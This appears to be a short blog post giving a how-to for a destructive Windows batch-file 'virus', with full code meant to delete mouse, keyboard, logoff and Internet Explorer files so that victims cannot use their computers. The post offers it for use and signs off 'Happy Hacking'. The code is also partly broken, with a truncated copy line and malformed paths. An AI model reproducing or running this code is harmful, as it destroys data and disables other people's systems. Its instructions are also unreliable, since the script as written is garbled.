Usually we write simple viruses in bath programming. This time also i have one Bath Programming. It will delete explore.exe , logoff , mouse , keyboard files . So victims can not do anything in his computer.
Now start making virus . Open Notepad and write This Code. and Save it any name . But extension would be like this >>>> anyname.bat
@echo off
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy c:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist c:\program files\internet explore\iexplore.exe del c:\program files\internet explore\iexplore.exe
I hope that now you will be success to create This Virus
Happy Hacking :)

0 comments:
Post a Comment